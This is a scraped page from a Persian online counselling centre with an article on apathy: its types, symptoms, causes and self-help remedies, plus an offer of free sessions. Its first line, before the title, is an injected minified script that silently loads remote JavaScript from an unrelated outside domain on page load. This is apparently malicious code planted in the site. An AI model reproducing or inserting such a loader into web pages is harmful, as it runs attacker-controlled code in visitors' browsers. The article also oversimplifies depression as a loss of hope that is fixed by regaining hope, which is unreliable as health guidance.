;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); چرا در زندگی احساس بی تفاوتی می کنیم؟ | مرکز مشاوره آنلاین روان‌یاری
احساس بی تفاوتی

چرا در زندگی احساس بی تفاوتی می کنیم؟

میزان پیشرفت خواندن شما

فهرست مطالب

احساس بی تفاوتی ، فقدان احساس است – فقدان علاقه، اشتیاق، عاطفه، هیجان یا نگرانی. بی‌تفاوتی حالتی است که در آن به چیزی که در اطرافمان اتفاق می‌افتد اهمیتی نمی‌دهیم و یا اقدامی نمی‌کنیم.

حس بی تفاوتی شامل عدم علاقه به جنبه های مختلف زندگی از جمله کارهای عادی روزمره و فعالیت های اجتماعی است. اکثر مردم هر از گاهی احساس بی‌تفاوتی را تجربه می‌کنند. زمانی است که این بی علاقگی پایدار باشد و بسیاری از حوزه های مختلف زندگی را تحت تأثیر قرار دهد، به یک مشکل مهم تبدیل می شود.

بی تفاوتی حالتی است که یک شخص،حرکت به سمت اهدافش را متوقف می کند. زندگی می تواند گاهی اوقات بسیار طاقت فرسا باشد. یک شغل جدید، تغییر در دوستی‌ها، افسردگی که احساس می‌کنید ، یا بیماری کاملاً غیرمنتظره… هر یک از این‌ها می‌تواند احساسات بزرگی را در ما ایجاد کند که مرتب کردنشان سخت است، یا حتی اعتراف آن دردناک است. گاهی اوقات چند روز یا حتی چند هفته طول می کشد تا تمام آنچه در درون ما می گذرد را پردازش کنیم و دوباره با موقعیت هایمان آرامش پیدا کنیم. اما گاهی اوقات، چند هفته تبدیل به ماه می شود و به نظر نمی رسد که احساسات طاقت فرسا از بین بروند. افسردگی عمیق‌تر می‌شود، ترس تشدید می‌شود، یا غم و اندوه به سادگی غیرقابل حل یا حتی ناامیدکننده به نظر می‌رسد.

احساس بی تفاوتی

انواع حس بی تفاوتی:

در یک مطالعه در سال 2019 محققان انواع بی تفاوتی را شناسایی و توصیف کردند:

  • بی تفاوتی عاطفی که با فقدان احساسات مثبت و منفی مشخص می شود،
  • بی تفاوتی رفتاری که با فقدان رفتارهای خودآغازی مشخص می شود،
  • بی تفاوتی عمومی که با انگیزه کمتر، پاسخ های عاطفی ضعیف و عدم مشارکت اجتماعی مشخص می شود.

دو شکل دیگر از بی تفاوتی که ممکن است افراد تجربه کنند عبارتند از  :

  • بی‌تفاوتی تماشاگر: این به تأثیر تماشاگر مربوط می‌شود، پدیده‌ای که در آن افراد شاهد نیاز به کمک شخص دیگری هستند، اما هیچ کاری برای مداخله یا ارائه کمک انجام نمی‌دهند.
  • خستگی از شفقت: گاهی اوقات افراد در ابتدا به آنها اهمیت می دهند، اما غرق می شوند یا از نظر جسمی و عاطفی خسته می شوند. این منجر به کاهش توانایی احساس شفقت یا همدلی با دیگران می شود.

درمان های بی تفاوتی به علل زمینه ای بستگی دارد. افراد ممکن است بتوانند احساسات عمومی بی‌تفاوتی را از طریق تغییر سبک زندگی و مراقبت از خود مدیریت کنند، اما علائم ناشی از بیماری‌های زمینه‌ای پزشکی یا روان‌پزشکی باید توسط ارائه‌دهنده مراقبت‌های بهداشتی شما برطرف شود.

علائم احساس بی تفاوتی:

برخی از نشانه های بی تفاوتی عبارتند از:

  • مشکل در انجام وظایف روزمره
  • عدم علاقه به فعالیت ها
  • فقدان انگیزه برای رسیدن به اهداف
  • سطوح انرژی پایین
  • کاهش مشارکت در فعالیت ها
  • بی احساس در پاسخ به رویدادهای مثبت و منفی
  • و …

علت بی تفاوت شدن:

  • تردید

وقتی تردید داشته باشید که انجام عملی،شما را در جهت رسیدن به اهدافتان کمک خواهد کرد یا خیر، حس بی تفاوتی خواهید داشت.فرض کنید که می خواستید ثروتمند شوید و به این منظور،تصمیم گرفتید یک تجارت اینترنتی را آغاز کنید.اگر نسبت به ثروتمند شدن توسط اینترنت،شک داشته باشید،حس بی تفاوتی را تجربه خواهید کرد.در چنین حالتی،هدف اصلی شما،پولدار شدن است اما به روشی که انتخاب کردید،شک دارید.به همین علت،بی تفاوت خواهید شد.

  • از دست دادن حس امید
  اضطراب مفید

این مورد،رایج ترین دلیل بی تفاوتی است.اکثریت مردم،وقتی امید خود برای رسیدن به هدفی را از دست می دهند،بی تفاوت می شوند.کسی که برای بار بیستم،در کنار گذاشتن سیگار شکست می خورد،نسبت به سیگار کشیدن بی تفاوت می شود.نه به این علت که برایش مهم نیست،بلکه به این علت که امید خود را از دست داده است.

  • بی تفاوتی و ترس ها

اگر اعتماد به نفس و حس ارزشمند بودن در شما پایین باشد و به خود و مهارت هایتان،اعتماد نداشته باشید،ممکن است از انجام هرکاری که ارزش شما را تست می کند،ترسان باشید.

احساس بی تفاوتی

چرا یک فرد،با وجود اینکه به شدت به رسیدن به اهدافش نیاز دارد،نسبت به تلاش کردن بی تفاوت می شود؟

اگر یکی از بخش های بسیار مهم در زندگی شما دارای مشکلی باشد، ممکن است نسبت به دیگر بخش های زندگی خود که اهمیت کمتری دارند، بی تفاوت شوید. مثلاً اگر کار شما، مهمترین بخش زندگی شما بوده باشد و در آن بخش، دچار مشکلات بسیار بزرگی باشید، ممکن است حتی نسبت به خوردن غذا، رسیدن به ظاهر خود و غیره، کاملاً بی تفاوت شوید. مثلاً هرچند داشتن بدن مناسب برای شما مهم باشد، اما از آنجایی که اولویت اول شما، کارتان بوده است و در آن، نتیجه‌ی مطلوب را کسب نکرده اید، به سادگی ممکن است نسبت به سایر بخش ها بی تفاوت شوید.

چگونه حس بی تفاوتی خود را متوقف کنید؟

برای توقف حس بی تفاوتی، می توانید کارهای پیشنهادی زیر را انجام دهید :

۱. انعطاف پذیر و سمج باشید .

وقتی یک روش،جواب نمی دهد،آن را رها کنید و روش دیگری را انتخاب کنید که شما را به هدف برساند. آنقدر تلاش کنید که به آنچه می خواهید برسید.

۲. خود را از نظر شخصیتی رشد دهید.

اگر اعتماد به نفس داشته و به مهارت های خود باور داشته باشید،بی تفاوتی کمتری را احساس خواهید کرد.شما باید حس خوبی را به خود،و قدرت مقابله ی خود با مشکلات داشته باشید و این حس،با کار کردن بر روی مهارت های خود و افزایش اعتماد به نفس،ایجاد خواهد شد.

۳. با افسردگی مقابله کنید.

افسردگی، وضعیت از دست دادن امید است ! اگر امید خود را از دست بدهید احساس بی تفاوتی خواهید کرد.بنابراین کافیست حس امید را دوباره به خود بازگردانید.با این کار خواهید دید که حس بی تفاوتی شما از بین خواهد رفت.

4.مشاوره فردی.

از دیگر روش‌هایی که در درمان احساس بی تفاوت بودن بسیار موثر است استفاده از خدمات مشاوره فردی میباشد. مشاوره فردی، به افراد این امکان را می‌دهد که احساسات، اعتقادات و رفتارهای خودشان را کاوش کرده و به شناخت بهتری از خود برسند و جنبه‌هایی از زندگی خود که تمایل دارند تغییر دهند، بیابند و برای تغییرات مورد نظر خود برنامه‌ریزی کنند. مشاوره فردی همچنین یک فرصت شخصی است که در آن شخص، حمایت و امنیت لازم در طول زمان‌های سخت و چالش‌برانگیز زندگی را دریافت می‌کند.

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.